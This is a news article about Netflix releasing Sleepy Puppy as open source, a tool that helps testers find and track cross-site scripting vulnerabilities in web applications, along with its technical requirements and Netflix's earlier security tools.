Netflix releases Sleepy Puppy anti-XSS tool

By

Helps devs tackle common yet dangerous security problem.

Video streaming giant Netflix has open-sourced its customisable Sleepy Puppy anti-cross site scripting tool to help developers secure their web applications against the vulnerability.

Netflix releases Sleepy Puppy anti-XSS tool
Sleepy Puppy. Source: Netflix.

Cross-site scripting (XSS) is a common security problem for website developers. It allows attackers to run potentially damaging scripts in visitors' web browsers, and has featured in the Open Web Applications Security Project top ten list of vulnerabilities for more than a decade.

Netflix engineers Scott Behrens and Patrick Kelley said that while there were existing tools to ferret out XSS holes in web apps, the company wanted a more comprehensive security framework to simplify cross-scripting propagation and identification, so as to allow developers to fix issues faster.

Netflix Sleepy Puppy testing workflow diagram.

The anti-XSS tool lets testers create payloads and PuppyScripts to collect data on when payloads are executed, along with screenshots and metadata on events.

Sleepy Puppy was released as open source on Github. It requires Python 2.7 with Flask and helper packages, SQLAlchemy with configurable backend storage, the Ace Javascript editor, and Html2Canvas Javascript for screenshots, which can be stored in Amazon S3 cloud storage.

Notifications can be set up via Amazon Web Services simple email service (SES).

Netflix, a large developer and user of open source software, has released several tools to the community over past years.

Just over a year ago, the company open sourced the Scumblr and Sketchy security scannng tools, and prior to that, the Security Monkey configuration, monitoring and analysis tool for Amazon Web Services, which hosts Netflix around the world.

Got a news tip for our journalists? Share it with us anonymously here.
Copyright © iTnews.com.au . All rights reserved.
Tags:

Most Read Articles

India's alarm over Chinese spying rocks CCTV makers

India's alarm over Chinese spying rocks CCTV makers

Hackers abuse modified Salesforce app to steal data, extort companies

Hackers abuse modified Salesforce app to steal data, extort companies

Woolworths' CSO is Optus-bound

Woolworths' CSO is Optus-bound

Cyber companies hope to untangle weird hacker codenames

Cyber companies hope to untangle weird hacker codenames

Log In

  |  Forgot your password?